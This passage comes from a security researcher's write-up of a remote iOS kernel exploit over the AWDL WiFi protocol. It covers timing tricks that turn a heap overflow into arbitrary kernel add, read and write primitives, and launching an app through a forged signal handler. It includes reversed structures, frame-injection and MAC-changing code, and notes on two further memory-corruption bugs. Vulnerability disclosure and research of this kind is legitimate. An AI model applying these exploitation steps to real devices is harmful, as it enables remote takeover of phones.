        this->peer_mac.octet[0],

        this->peer_mac.octet[1],

        this->peer_mac.octet[2],

        this->peer_mac.octet[3],

        this->peer_mac.octet[4],

        this->peer_mac.octet[5]);

    this->per_second_timestamp = mach_absolute_time();

    this->n_frames_in_last_second = 1;

  }

  else if ( frames_in_last_second >= 0x21 )

  {

    *(_DWORD *)(a2 + 20) = 1;

    return 0;

  }


We have to reach that return 0 statement, which means we need the first if clause to be false, and the second one to be true.


The first statement checks whether more than 1024 ms have elapsed since the per_second_timestamp was updated.


The second statement checks whether more than 32 frames have been received since the per_second_timestamp was last updated.


So to reach the return 0 and avoid the panics due to an invalid peer_manager pointer we'd need to ensure that 32 frames have been received from the same spoofed peer within a 1024ms period.


You are hopefully starting to see why the ACK sniffing model vs the timing model is advantageous now; if the target had only received 31 frames then attempting the arbitrary add would cause a kernel panic.


Recall that at this point however I'm using a 2.4Ghz only WiFi adaptor for injection and monitoring and the only data rate I can get to work is 1Mbps. Actually getting 33 frames onto the air inside 1024ms, especially as only a fraction of that time will be AWDL Availability Windows, is probably impossible.


Furthermore, as I suddenly need far more accuracy in terms of knowing whether frames were received or not, I start to notice how unreliable my monitor device is. It appears to be frequently dropping frames, with an error rate seemingly positively-correlated with how long the adapter has been plugged in. After a while my testing model includes having to unplug the injection and monitoring adaptors after each test to let them cool down. This hopefully gives a taste of how frustrating many parts of this exploit development processes were. Without a stable and fast testing setup prototyping ideas is painfully slow, and figuring out whether an idea didn't work is made harder because you never know if your idea didn't work, or if it was yet another hardware failure.

Changing the clocks

It's probably impossible to make the timing checks pass using intended behaviour with the current setup. But we still have a few tricks up our sleeve. We do have a memory corruption vulnerability after all.


Looking at the two relevant fields per_second_timestamp and n_frames_in_last_second we notice that they're at the following offsets:


/* +0x1648 */  struct ether_addr sync_tree_macs[10];

/* +0x1684 */  uint8_t sync_error_count;

/* +0x1685 */  uint8_t had_chanseq_tlv;

/* +0x1686 */  uint8_t pad3[2];

/* +0x1688 */  uint64_t per_second_timestamp;

/* +0x1690 */  uint32_t n_frames_in_last_second;

/* +0x1694 */  uint8_t pad21[4];

/* +0x1698 */  void *steering_msg_blob;

/* +0x16A0 */  uint32_t steering_msg_blob_size;


So the timestamp (which is absolute, not relative) and the frame count are just after the sync tree buffer which we can overflow out of meaning we can reliably corrupt them and provide a fake timestamp and count.


Arbitrary add idea 1: clock synchronization

My first idea was to try to determine the delta between the target device's absolute clock and the raspberry pi running the exploit. Then safely triggering an arbitrary add would be a three step process:


1) Compute a valid per_second_timestamp value at a point just in the future and do a short overflow within upper_peer to give it that arbitrary timestamp and a high n_frames_in_last_second value.


2) Do a long overflow from lower_peer to corrupt upper_peer's peer_manager pointer to point 0x7c80 bytes below the arbitrary add target.


3) Spoof a frame from upper_peer where the length corresponds to the size of the arbitrary add. As long as the timestamp we wrote in step 1 is less than 1024 ms earlier than the target device's current current clock, and the n_frames_in_last_second is still large, we'll hit the early error return path.


To pull this off we'll need to synchronize our clocks. AWDL itself is built on accurate timing and there are timing values in each AWDL frame. But they don't really help us that much because those are relative timestamps whereas we need absolute timestamps.


Luckily we already have a restricted read primitive, and in fact we've already accidentally used it to leak a timestamp:


The same annotated hexdump from the initial read primitive when it found two neighbouring peers. At offset +0x43 in the dump we can see the per_second_timestamp value. We'd now like to leak one of these which we force to be set at an exact moment in time


We can use the initial limited arbitrary read primitive again under more controlled conditions to try to determine the clock delta like this:


1) Wait 1024 ms.


2) Spoof a frame from lower_peer, which will cause it to get a fresh per_second_timestamp.


3) When we receive an ACK, record the current timestamp on the raspberry pi.


4) Use the BSS Steering read to read lower_peer's timestamp.


5) Convert the two timestamps to the same units and compute the delta.


Now we can perform the arbitrary write as described above by using the SyncTree overflow inside upper_peer to give it a fake and valid per_second_timestamp and n_frames_in_last_second value. This works, and we can add an arbitrary byte to an arbitrary address!


Unfortunately it's not very reliable. There are too many things to go wrong here, and for a painful couple of weeks everything went wrong. Firstly, as previously discussed, the injection and monitoring hardware is just too unreliable. If we miss ACKs we end up getting the clock delta wrong, and if the clock delta is too wrong we'll panic the target. Also, we're still sending frames very slowly, and the slower this all happens the lower the probability that our fake timestamp stays valid by the time it's used. We need an approach which is going to work far more reliably.

More timing tricks

Having to synchronize the clocks is fragile. Looking more closely at the code, I realized there was another way to reach the error bail out path without manually syncing.


If we wait 1024ms then spoof a frame, the peer structure will get a fresh timestamp which will pass the timestamp check for the next 1024ms. 


We can't do that and then overflow into the n_frames_in_last_second field, because that field is after the per_second_timestamp so we'd corrupt it. But there is actually a way to corrupt the n_frames_in_last_second field without touching the timestamp:


1) Wait 1024ms then spoof a valid frame from upper_peer, giving its IO80211AWDLPeer object a valid per_second_timestamp.


2) Overflow from lower_peer into upper_peer, setting upper_peer's peer_manager pointer to 0x7c80 bytes before upper_peer's frames_in_last_second counter.


3) Spoof a valid frame from upper_peer.


Let's look more closely at exactly what will happen now:


It's now the case that this->peer_manager points 0x7c80 before peer->n_frames_in_last_second when IO80211AWDLPeer::actionFrameReport gets called on upper_peer:


  peer_manager = this->peer_manager;

  frame_len = mbuf_len(frame_mbuf);


Because we've corrupted upper_peer's peer_manager pointer, peer_manager->total_bytes_received overlaps with upper_peer->n_frames_in_last_second, meaning this add will add the frame length to upper_peer->n_frames_in_last_second! The important part is that this write happens before n_frames_in_last_second is checked!


  peer_manager->total_bytes_received += frame_len;

  ++this->n_frames_in_last_second;

  per_second_timestamp = this->per_second_timestamp;

  absolute_time_now = mach_absolute_time();

  frames_in_last_second = this->n_frames_in_last_second;


And if we're fast enough we'll still pass this check, because we have a real timestamp:


  if ( ((absolute_time_now - per_second_timestamp) / 1000000)

        > 1024 )// more than 1024ms difference

  {

     ...

  }


and now we'll also pass this check and return:


  else if ( frames_in_last_second >= 0x21 )

  {

    *(_DWORD *)(a2 + 20) = 1;

    return 0;

  }


We've now got a timestamp still valid for some portion of 1024ms and n_frames_in_last_second is very large, without having to send that many frames within the 1024ms window or having to manually synchronize the clocks.


The fourth step is then to overflow again from lower_peer to upper_peer, this time pointing peer_manager to 0x7c80 below the desired add target. Finally, spoof a frame from upper_peer, padded to the correct size for the desired add value.

Another timing trick

The final timing trick for now was to realize we could skip the initial 1024ms wait by first overflowing within upper_peer to set its timestamp to 0. Then the next valid frame spoofed from upper_peer would be sure to set a valid per_second_timestamp usable for the next 1024 ms. In this way we can use the arbitrary write quite quickly, and start building our next primitive. Except...

I'm still panicking...

Earlier I accidentally discovered another exploitable zero day. Fortunately it was fairly easy to avoid triggering it, but my exploit continued to panic the target device in a multitude of ways. Of course, as before, I'd sort of expect this and indeed I worked out a few ways in which I was potentially causing panics.


One was that when I was overwriting the peer_manager pointer I was also overwriting the flink and blink pointers of the peer in the linked list of peers. If peers had been added or removed from the list since I had taken the copy of those pointers I could now be corrupting the list, potentially adding back stale pointers or altering the order. This was bound to cause problems so I added a workaround: I would ensure that no spoofed peers ever got freed. This is simple to implement; just ensure every peer spoofs a frame around every 20 seconds or so and you'll be fine.


But my test device was still panicking, so I decided to really dig into some of the panics and work out exactly what seems to be happening. Am I accidentally triggering yet another zero-day?

More accidental zero-day

After a day or so of analysis and reversing I realize that yes, this is in fact another exploitable zero-day in AWDL. This is the third, also reachable in the default configuration of iOS.


This vulnerability took significantly more effort to understand than the double free. The condition is more subtle and boils down to a failure to clear a flag. With no upfront knowledge of the names or purposes of these flags (and there are hundreds of flags in AWDL) it required a lot of painstaking reverse engineering to work out what's going on. Let's dive in.


resetAndRemovePeerInfo is a member method of the IO80211PeerBssSteeringManager. It's called when a peer is being destructed:


IO80211PeerBssSteeringManager::resetAndRemovePeerInfo(

  IO80211AWDLPeer *peer) {

 

  struct BssSteeringCntx *cntx;

 

  if (!peer) {

    // log error and return

  }

 

  peer->added_to_fw_cache = 0;

 

  struct BssSteeringCntx* cntx = this->steering_cntx;

 

  if (cntx->peer_count) {

    for (uint64_t i = 0; i < cntx->peer_count; i++) {

      if (memcmp(&cntx->peer_macs[i], &peer->peer_mac, 6uLL) == 0) {

        memset(&cntx->peer_macs[i], 0, 6uLL); 

      }

    };

  }

  cntx->peer_count--;

}


We can see a callsite here in IO80211AWDLPeerManager::removePeer:


if (peer->added_to_fw_cache) {

  if (this->steering_manager)  {

    this->steering_manager->resetAndRemovePeerInfo(peer);

  }

}


added_to_fw_cache is a name I have given to the flag field at +0x4b8 in IO80211AWDLPeer. We can see that if a peer with that flag set is destructed then the peer manager will call the steering_manager's resetAndRemovePeerInfo method shown above.


resetAndRemovePeerInfo clears that flag then iterates through the steering context object's array of currently-being-steered peer MAC addresses. If the peer being destructed's MAC address is found in there, then it's memset to 0.


The logic already looks a little odd; they decrement peer_count but don't shrink the size of the array by swapping the empty slot with the last valid entry, meaning it will only work correctly if the peers are destructed in the exact reverse order that they were added. Kinda weird, but probably not a security vulnerability.


The logic of this function means peer_count will be decremented each time it runs. But what would happen if this function were called more times than the initial value of peer_count? In the first extra invocation the memcmp loop wouldn't execute and peer_count would be decremented from 0 to 0xffffffff, but in the second extra invocation, the peer_count is non-zero, so it would enter the memcmp/memset loop. But the only loop termination condition is i >= peer_count, so this loop will try to run 4 billion times, certainly going off the end of the 8 entry peer_macs array:


struct __attribute__((packed)) BssSteeringCntx {

/* +0x0000 */  uint32_t first_field;

/* +0x0004 */  uint32_t service_type;

/* +0x0008 */  uint32_t peer_count;

/* +0x000C */  uint32_t role;

/* +0x0010 */  struct ether_addr peer_macs[8];

/* +0x0040 */  struct ether_addr infraBSSID;

/* +0x0046 */  uint8_t pad4[6];

/* +0x004С */  uint32_t infra_channel_from_datapath_tlv;

/* +0x0050 */  uint8_t pad8[8];

/* +0x0058 */  char ssid[32];

/* +0x0078 */  uint8_t pad1[12];

/* +0x0084 */  uint32_t num_peers_added_to_umi;

/* +0x0088 */  uint8_t pad_10;

/* +0x0089 */  uint8_t pendingTransitionToNewState;

/* +0x008А */  uint8_t pad7[2];

/* +0x008C */  enum BSSSteeringState current_state;

/* +0x0090 */  uint8_t pad5[8];

/* +0x0098 */  struct IOTimerEventSource *bssSteeringExpiryTimer;

/* +0x00A0 */  struct IOTimerEventSource *bssSteeringStageExpiryTimer;

/* +0x00A8 */  uint8_t pad9[8];

/* +0x0000 */  uint32_t steering_policy;

/* +0x00B4 */  uint8_t inProgress;

}

My reverse engineered version of the BSS Steering context object. I've managed to name most of the fields.


This is only a vulnerability if it's possible to call this function peer_count+2 times. (To decrement peer_count down to 0, then set it to -1, then re-enter with peer_count = -1.)


Whether or not resetAndRemovePeerInfo is called when a peer is destructed depends only on whether that peer has the added_to_fw_cache flag set; this gives us an inequality: the number of peer's with added_to_fw_cache set must be less than or equal to peer_count+1. Probably it's really meant to be the case that peer_count should be equal to the number of peers with that flag set. Is that the case?


No, it's not. After steering fails we restart the BSS Steering state machine by sending a new BSSSteering TLV with a steeringMsgID of 6 rather than 0; this means the steering state machine gets a BSS_STEERING_REMOTE_STEERING_TRIGGER event rather than the BSS_STEERING_RECEIVED_DIRECTED_STEERING_CMD which was used to start it. This resets the steering context object, filling the peer_macs array with whatever new peer macs we specify in the new DIRECTED_STEERING_CMD TLV. If we specify different peers to those already in the context's peer_macs array, then those old entries' corresponding IO80211AWDLPeer objects don't have their added_to_fw_cache field cleared, but the new peers do get that flag set.


This means that the number of peers with the flags set becomes greater than context->peer_count, so as the peers eventually get destructed peer_count goes down to zero, underflows then causes memory corruption.


I was hitting this condition each time I restarted steering, though it would take some time for the device to actually kernel panic because the steered peers needed to timeout and get destructed.


Root causing this second bonus remotely-triggerable iOS kernel memory corruption was much harder than the first bonus double-free; the explanation given above took a few days work. It was necessary though as I had to work around both of these vulnerabilities to ensure I didn't accidentally trigger them, which in total added a significant amount of extra work. 


The work-around in this case was to ensure that I only ever restarted steering the same peers; with that change we no longer hit the peer_count underflow and only corrupt the memory we're trying to corrupt! This issue was fixed in iOS 13.6 as CVE-2020-9906.


The target is no longer randomly kernel panicking even when we don't trigger the intended Sync Tree heap overflow, so let's get back to the exploit.

Add to read

We have an arbitrary add primitive but it's not quite an arbitrary write yet. For that, we need to know the original values so we can compute the correct per-byte frame sizes to overflow each byte to write a truly arbitrary value.


Probably we'll have to use the arbitrary add to corrupt something in a peer or the peer manager such that we can get it to follow an arbitrary pointer when building an MI or PSF frame which will be sent over the air.


I went back to IDA and spent a long time looking through code to search for such a primitive, and found one in the construction of the Service Request Descriptor TLVs in MI frames:


IO80211AWDLPeerManager::buildMasterIndicationTemplate

  (char *buffer, u32 total_size ...

...

  req_desc = this->req_desc;

  if ( req_desc ){

    desc_len = req_desc->desc_len;        // length

    desc_ptr = req_desc->desc_ptr;

    tlv_len = desc_len+4;

    if (desc_len && desc_ptr && tlv_len < remaining) {

      buffer[offset] = 16; // type

      *(u16*)&buffer[offset+1] = desc_len + 1; // len

      buffer[current_buffer_offset+3] = 3;

      IO80211ServiceRequestDescriptor::copyDataOnly(

        req_desc,

        &buffer[offset+4],

        total_size - offset - 4);

    }


This is reading an IO80211ServiceRequestDescriptor object pointer from the peer manager from which it reads another pointer and a length. If there's space in the MI frame for that length of buffer then it calls the RequestDescriptor's copyDataOnly method, which simply copies from the RequestDescriptor into the MI frame template. It's only reading these two pointer and length fields which are at offset +0x40 and +0x54 in the request descriptor, so by pointing the IO80211AWDLPeerManager's req_desc pointer to data we control we can cause the next MI template which is generated to contain data read from an arbitrary address, this time with no restrictions on the data being read.


We can use the limited read primitive we currently have to read the existing value of the req_desc pointer, we just need to find somewhere below it in the peer_manager object where we know there will always be a fixed, small dword we can use as the length value needed for the read. Indeed, a few bytes below this there is such a value.


The first trick is in choosing somewhere to point the req_desc pointer to. We want to choose somewhere where we can easily update the read target without having to trigger the memory corruption. From reading the TLV parsing code I knew there were some TLVs which have very little processing. A good example, and the one I chose to use, is the NSync TLV. The only processing is to check that the total TLV length including the header is less than or equal to 0x40. That entire TLV is then memcpy'ed into a 0x40 byte buffer in the peer object at offset +0x4c4:


memcpy(this->nsync_tlv_buf, tlv_ptr, tlv_total_len);


We can use the arbitrary write to point the peer_manager's req_desc pointer to just below the lower_peer's nsync_tlv buffer such that by spoofing NSync TLVs from lower_peer we can update the fake descriptor pointer and length values.


Some care needs to be taken when corrupting the req_desc pointer however as we can currently only do byte-by-byte writes and the req_desc pointer might be read while we are corrupting it. We therefore need a way to stop those reads.


IO80211AWDLPeerManager::updateBroadcastMI is on the critical path for the read, meaning that every time the MI frame is updated it must go through this function, which contains the following check:


if (this->frames_outstanding <= this->frames_limit) {

  IO80211AWDLPeerManager::updatePrimaryPayloadMI(...


frames_limit is initialized to a fixed value of 3. If we first use the arbitrary add to make frames_outstanding very large, this check will fail and the MI template won't be updated, and the req_desc member won't be read. Then after we're done corrupting the req_desc pointer we can set this value back to its original value and the MI templates will be updated again and the arbitrary read will work.


An easy way to do this is to add 0x80 to the most-significant byte of frames_outstanding. The first time we do this it will make frames_outstanding very large. If it were 2 to begin with it would go from: 0x00000002 to 0x80000002.


Adding 0x80 to that MSB as second time would cause it to then overflow back 0, resetting the value to 2 again. This of course has the side effect of adding 1 to the next dword field in the peer_manager when it overflows, but fortunately this doesn't cause any problems.


Now by spoofing an NSync TLV from lower_peer and monitoring for a change in the contents of the 0x10 TLV sent by the target in MI frames we can read arbitrary kernel data from arbitrary addresses.

Speedy reader

We now have a truly arbitrary read, but unfortunately it can be a bit slow. Sometimes it takes a few seconds for the MI template to be updated. What we need is a way to force the MI template to be regenerated on demand.


Looking through the cross references to IO80211AWDLPeerManager::updateBroadcastMI I noticed that it seems the MI template gets regenerated each time the peer bloom filter gets updated in IO80211AWDLPeerManager::updatePeerListBloomFilter. As we saw much earlier in this post, and I had determined months before this point, the bloom filter code isn't used. But... we have an arbitrary add so we could just turn it on!


Indeed, by flipping the flag at +0x5950 in the IO80211AWDLPeerManager we can enable the peer bloom filter code.


With peer bloom filters enabled each time the target sees a new peer, it regenerates the MI template in order to ensure it's broadcasting an up-to-date bloom filter containing all the peers it knows about (or at least the first 256 in the peer list.) This means we can make our arbitrary read much much faster: we just need to send the correct NSync TLV containing our read target then spoof a new peer and wait for an updated MI. With this technique complete we can read arbitrary remote kernel memory over the air at a rate of many kilobytes per second.

Remote kernel memory read/write API

At this point we can build the typical abstraction layer used by a local privilege escalation exploit, except this time it's remote.


The main kernel memory read function is:


void* rkbuf(uint64_t kaddr, uint32_t len);


With some helpers to make the code simpler:


uint64_t rk64(uint64_t kaddr);

uint32_t rk32(uint64_t kaddr);

uint8_t rk8(uint64_t kaddr);


Similarly for writing kernel memory, we have the main write method:


void wk8(uint64_t kaddr, uint8_t desired_byte);


and some helpers:


void wkbuf(uint64_t kaddr, uint8_t* desired_value, uint32_t len);

void wk64(uint64_t kaddr, uint64_t desired_value);

void wk32(uint64_t kaddr, uint32_t desired_value);


From this point the exploit code starts to look a lot more like a regular local privilege escalation exploit and the remote aspect is almost completely abstracted away.

Popping calc with 15 bytes

This is already enough to pop calc. To do this we just need a way to inject a control flow edge into userspace somehow. A bit of grepping through the XNU code and I stumbled across the code handling BSD signal delivery which seemed promising.


Each process structure has an array of signal handlers; one per signal number.


struct sigacts {

  user_addr_t ps_sigact[NSIG];   /* disposition of signals */

  user_addr_t ps_trampact[NSIG]; /* disposition of signals */

  ...


The ps_trampact array contains userspace function pointers. When the kernel wants a userspace process to handle a signal it looks up the signal number in that array:


  trampact = ps->ps_trampact[sig];


then sets the userspace thread's pc value to that:


  sendsig_set_thread_state64(

    &ts.ts64.ss,

    catcher,

    infostyle,

    sig,

    (user64_addr_t)&((struct user_sigframe64*)sp)->sinfo,

    (user64_addr_t)p_uctx,

    token,

    trampact,

    sp,

    th_act)


Where sendsig_set_thread_state64 looks like this:


static kern_return_t

sendsig_set_thread_state64(arm_thread_state64_t *regs,

                           user64_addr_t catcher,

                           int infostyle,

                           int sig,

                           user64_addr_t p_sinfo,

                           user64_addr_t p_uctx,

                           user64_addr_t token,

                           user64_addr_t trampact,

                           user64_addr_t sp,

                           thread_t th_act) {

  regs->x[0] = catcher;

  regs->x[1] = infostyle;

  regs->x[2] = sig;

  regs->x[3] = p_sinfo;

  regs->x[4] = p_uctx;

  regs->x[5] = token;

  regs->pc = trampact;

  regs->cpsr = PSR64_USER64_DEFAULT;

  regs->sp = sp;

 

  return thread_setstatus(th_act,

                          ARM_THREAD_STATE64,

                          (void *)regs,

                          ARM_THREAD_STATE64_COUNT);

}


The catcher value in X0 is also completely controlled, read from the ps_sigact array.


Note that the kernel APIs for setting userspace register values don't require userspace pointer authentication codes.


We can set X0 to the constant CFString "com.apple.calculator" already present in the dyld_shared_cache. On 13.3 on the 11 Pro this is at 0x1BF452778 in an unslid shared cache.


We set PC to this gadget in CommunicationSetupUI.framework:


MOV  W1, #0

BL   _SBSLaunchApplicationWithIdentifier


This clears W1 then calls SBSLaunchApplicationWithIdentifier, a Springboard Services Framework private API for launching apps.


The final piece of this puzzle is finding a process to inject the fake signal into. It needs to have the com.apple.springboard.launchapplications entitlement in order for Springboard to process the launch request. Using Jonathan Levin's entitlement database it's easy to find the list of injection candidates.


We remotely traverse the linked list of running processes looking for a victim, set a fake signal handler then make a thread in that process believe it has to handle a signal by OR'ing in the correct signal number in the uthread's siglist bitmap of pending signals:


wk8(uthread+0x10c+3, 0x40); // uthread->siglist


and finally making the thread believe it needs to handle a BSD AST:


wk8_no_retry(thread+0x2e8, 0x80); // thread->act |= AST_BSD


Now, when this thread gets scheduled and tries to handling pending ASTs, it will try to handle our fake signal and a calculator will appear:


An iPhone 11 Pro running Calculator.app with a monitor in the background displaying the output from the final stage of the AWDL exploit

Improving the bootstrap BSS steering read

We've popped calc, we're done! Or are we? It's kinda slow, and there's no real reason for it to be so slow. We managed to build quite a fast arbitrary read primitive so that's not the bottleneck. The major bottleneck at the moment is the initial BSS Steering-based read. It's taking 8 seconds per read because it needs the state machine to time out between each attempt.


As we saw, however, the BSS Steering TLV indicates that we should be able to steer up to 8 peers at the same time, meaning that we should be able to improve our read speed by at least 8x. In fact, if we can get away with 8 or fewer initial reads our read speed could be much faster than that.


However, when you try to steer 8 peers simultaneously, it doesn't quite work as expected:


When multiple peers are steered the UMIs flood the airwaves. In this example I was steering 8 peers but the frames are dominated by UMIs to the first peer. You can see a handful of UMIs to :06, and one to :02 amongst the dozens to :00.


Testing against MacOS we also see the following log message:


Peer 22:22:aa:22:00:00 DID NOT ack our UMI


When the target tries to steer 8 peers at the same time it starts flooding the airwaves with UMI frames directed at the target peers - so many in fact that it never actually manages to send the UMIs for all 8 steering targets before timing out.


We've already covered how to stall the initial sending of UMIs by controlling the channel sequence, but it looks like we're also going to have to ACK the UMI frames.

ACK a MAC?

As we saw earlier, ACKs in 80211.a and g are timing based. To ACK a frame you have to send the ACK in the short window following the transmission of the frame. We definitely can't do that using libpcap, the timing needs microsecond precision. We probably can't even do that with a custom kernel driver.


There is however an obscure WiFi adaptor monitor mode feature called "Active Monitor Mode", supported by very few chipsets.


Active monitor mode allows you to inject and monitor arbitrary frames as usual, except in active monitor mode (as opposed to regular monitor mode) the adaptor will still ACK frames if they're being sent to its MAC address.


The Mediatek MT76 chipset was the only one I could find with a USB adaptor that supports this feature. I bought a bunch of MT76-based adaptors and the only one where I could actually get this feature to work was the ZyXEL NWD6605 which uses an mt76x2u chipset.


The only issue was that I could only get Active Monitor Mode to actually work when running at 12 Mbps on a 5GHz channel but my current setup was using adaptors which were not capable of 5GHz injection.

Moving to 5GHz

I had tried right back at the beginning of the exploit development process to get 5GHz injection and monitoring to work; after trying for a week with lots of adaptors and building many, many branches of kernel drivers and fiddling with radiotap headers I had given up and decided to focus on getting something working on 2.4GHz with my old adaptors.


This time around I just bought all the adaptors I could find which looked like they might have even the remotest possibility of working and tried again.


One of the challenges is that OEMs won't consistently use the same chipset or revision of chipset in a device, which means getting hold of a particular chipset and revision can be a hit-and-miss process.


Here are all the adaptors which I used during this exploit to try to find support for the features I wanted:


All the WiFi adaptors tested during this exploit development process, from top left to bottom right: D-Link DWA-125, Netgear WG111-v2, Netgear A6210, ZyXEL NWD6605, ASUS USB-AC56, D-Link DWA-171, Vivanco 36665, tp-link Archer T1U, Microsoft Xbox wireless adaptor Model 1790, Edimax EW-7722UTn V2, FRITZ!WLAN AC430M, ASUS USB-AC68, tp-link AC1300


In the end I required two different adaptors to get the features I wanted:


Active monitor mode and frame injection: ZyXEL NWD6605 using mt76x2u driver


Monitor mode (including management and ACK frames): Netgear A6210 using rtl8812au driver


With this setup I was able to get frame injection, monitor mode sniffing of all frames including management and ACK frames as well as Active monitor mode to work at 12 Mbps on channel 44.

Working with Active Monitor Mode

You can enable the feature like this:


ip link set dev wlan1 down

iw dev wlan1 set type monitor

iw dev wlan1 set monitor active control otherbss

ip link set dev wlan1 up

iw dev wlan1 set channel 44


We can change the card's MAC address using the ip tool like this:


ip link set dev wlan1 down

ip link set wlan1 address 44:44:22:22:22:22

ip link set dev wlan1 up


Changing the MAC address like this takes at least a second and the interface has to be down. Since we're trying to make these reads as fast as possible I decided to take a look at how this mac address changing actually worked to see if I could speed it up...


Three ways to set a MAC: 1 - ioctl

The old way to set a network device MAC address is to use the SIOCSIFHWADDR ioctl:


struct ifreq ifr = {0};

uint8_t mac[6] = {0x22, 0x23, 0x24, 0x00, 0x00, 0x00};

memcpy(&ifr.ifr_hwaddr.sa_data[0], mac, 6);

int s = socket(AF_INET, SOCK_DGRAM, 0);

strcpy(ifr.ifr_name, "wlan1");

ifr.ifr_hwaddr.sa_family = ARPHRD_ETHER;

int ret = ioctl(s, SIOCSIFHWADDR, &ifr);

printf("ioctl retval: %d\n", ret);


This interface is deprecated and doesn't work at all for this driver.


Three ways to set a MAC: 2 - netlink

The current supported interface is netlink. It took a whole day to learn enough about netlink to write a standalone PoC to change a MAC address. Netlink is presumably very powerful but also quite obtuse. And even after all that (perhaps unsurprisingly) it's no faster than the command line tool which is really just making these same netlink API calls too.


Check out change_mac_nl.c in the released exploit source code to see the netlink code.


Three ways to set a MAC: 3 - hacker

Trying to do this the supported way has failed, it's just way too slow. But thinking about it, what is the MAC anyway? It's almost certainly just some field stored in flash or RAM on the chipset and yes, diving in to the mt76x2u linux kernel driver source and tracing the functions which set the MAC address we can see that ends up writing to some configuration registers on the chip:


#define MT_MAC_ADDR_DW0 0x1008

#define MT_MAC_ADDR_DW1 0x100c

 

void mt76x02_mac_setaddr(struct mt76x02_dev *dev, const u8 *addr)

{

  static const u8 null_addr[ETH_ALEN] = {};

  int i;

 

  ether_addr_copy(dev->mt76.macaddr, addr);

 

  if (!is_valid_ether_addr(dev->mt76.macaddr)) {

    eth_random_addr(dev->mt76.macaddr);

    dev_info(dev->mt76.dev,

             "Invalid MAC address, using random address %pM\n",

             dev->mt76.macaddr);

  }

 

  mt76_wr(dev,

          MT_MAC_ADDR_DW0,

          get_unaligned_le32(dev->mt76.macaddr));

 

  mt76_wr(dev,

          MT_MAC_ADDR_DW1,

          get_unaligned_le16(dev->mt76.macaddr + 4) |

            FIELD_PREP(MT_MAC_ADDR_DW1_U2ME_MASK, 0xff));

   ...


I wonder if I could just write directly to those configuration registers? Would it completely blow up? Or would it just work? Is there an easy way to do this or will I have to patch the driver?


Looking around the driver a bit we can see it has a debugfs interface. Debugfs is a very neat way for drivers to easily expose lots of internal stuff out to userspace, restricted to root, for logging and monitoring as well as for messing around with:


[email protected]:/sys/kernel/debug/ieee80211/phy7/mt76# ls

agc  ampdu_stat  dfs_stats  edcca  eeprom  led_pin  queues  rate_txpower  regidx  regval  temperature  tpc  tx_hang_reset  txpower


What we're after is a way to write to arbitrary control registers, and these two debugfs files let you do exactly that:


# cat regidx

0

# cat regval

0x76120044


If you write the address of the configuration register you want to read or write to the regidx file as a decimal value then reading or writing the regval file lets you read or write that configuration register as a 32-bit hexadecimal value. Note that exposing configuration registers this way is a feature of this particular driver's debugfs interface, not a generic feature of debugfs. With this we can completely skip the netlink interface and the requirement to bring the device down and instead directly manipulate the internal state of the adaptor.


I replace the netlink code with this:


void mt76_debugfs_change_mac(char* phy_str, struct ether_addr new_mac) {

    union mac_dwords {

      struct ether_addr new_mac;

      uint32_t dwords[2];

    } data = {0};

 

    data.new_mac = new_mac;

 

    char lower_dword_hex_str[16] = {0};

    snprintf(lower_dword_hex_str, 16, "0x%08x\n", data.dwords[0]);

 

    char upper_dword_hex_str[16] = {0};

    snprintf(upper_dword_hex_str, 16, "0x%08x\n", data.dwords[1]);

 

    char* regidx_path = NULL;

    asprintf(&regidx_path,

             "/sys/kernel/debug/ieee80211/%s/mt76/regidx",

             phy_str);

 

    char* regval_path = NULL;

    asprintf(&regval_path,

             "/sys/kernel/debug/ieee80211/%s/mt76/regval",

             phy_str);

 

    file_write_string(regidx_path, "4104\n");

    file_write_string(regval_path, lower_dword_hex_str);

 

    file_write_string(regidx_path, "4108\n");

    file_write_string(regval_path, upper_dword_hex_str);

 

    free(regidx_path);

    free(regval_path);   

}


and... it works! The adaptor instantly starts ACKing frames to whichever MAC address we write in to the MAC address field in the adaptor's configuration registers.


All that's then required is a rewrite of the early read code:


Now it starts out steering 8 stalled peers. Each time a read is requested, if there's still time left before steering will timeout and there are still stalled peers, one stalled peer is chosen, has it's steering_msg_blob pointer corrupted with the read target and gets unstalled. The target will start sending UMIs to that peer, we set the correct MAC address on the active monitor device, sniff the UMI and ACK it to stop the peer sending more. From the UMI we extract the value from TLV 0x1d and get the disclosed kernel memory.


If there are no more stalled peers, or steering has timed out, we wait a safe amount of time until we're able to restart all 8 peers and start again:


struct ether_addr reader_peers[8];

 

struct early_read_params {

    struct ether_addr dst;

    char* phy_str;

} er_para;

 

void init_early_read(struct ether_addr dst, char* phy_str) {

  er_para.dst = dst;

  er_para.phy_str = phy_str;

 

  reader_peers[0] = *(ether_aton("22:22:aa:22:00:00"));

  reader_peers[1] = *(ether_aton("22:22:aa:22:00:01"));

  reader_peers[2] = *(ether_aton("22:22:aa:22:00:02"));

  reader_peers[3] = *(ether_aton("22:22:aa:22:00:03"));

  reader_peers[4] = *(ether_aton("22:22:aa:22:00:04"));

  reader_peers[5] = *(ether_aton("22:22:aa:22:00:05"));

  reader_peers[6] = *(ether_aton("22:22:aa:22:00:06"));

  reader_peers[7] = *(ether_aton("22:22:aa:22:00:07"));

}

 

// state required between early reads:

uint64_t steering_begin_timestamp = 0;

int n_steered_peers = 0;

 

void* try_early_read(uint64_t kaddr, size_t* out_size) {

  struct ether_addr peer_b = *(ether_aton("22:22:bb:22:00:00"));

  int n_peers = 8;

  struct ether_addr reader_peer;

  int should_restart_steering = 0;

 

  // what phase are we in?

 

  uint64_t milliseconds_since_last_steering =

    (now_nanoseconds() - steering_begin_timestamp) /

    (1ULL*1000ULL*1000ULL);

  

  if (milliseconds_since_last_steering < 5000 &&

      n_steered_peers < 8) {

    // if less than 5 seconds have elapsed since we started steering

    // and we haven't reached the peer limit, then steer the next peer

 

    reader_peer = reader_peers[n_steered_peers++];

 

  } else if (milliseconds_since_last_steering < 8000) {

    // wait for the steering machine to timeout so we can restart it

    usleep((8000 - milliseconds_since_last_steering) * 1000);

    should_restart_steering = 1;

  } else {

    // more than 8 seconds have already elapsed since we last 

    //started steering (or we've never started it) so restart

    should_restart_steering = 1;

  }

 

  if (should_restart_steering) {

    // make reader peers suitable for bss steering

    n_steered_peers = 0;

 

    for (int i = 0; i < n_peers; i++) {

      inject(RT(),

          WIFI(er_para.dst, reader_peers[i]),

          AWDL(),

          SYNC_PARAMS(),

          CHAN_SEQ_EMPTY(),

          HT_CAPS(),

          UNICAST_DATAPATH(0x1307 | 0x800),

          PKT_END());

    }

 

    inject(RT(),

           WIFI(er_para.dst, peer_b),

           AWDL(),

           SYNC_PARAMS(),

           HT_CAPS(),

           UNICAST_DATAPATH(0x1307),

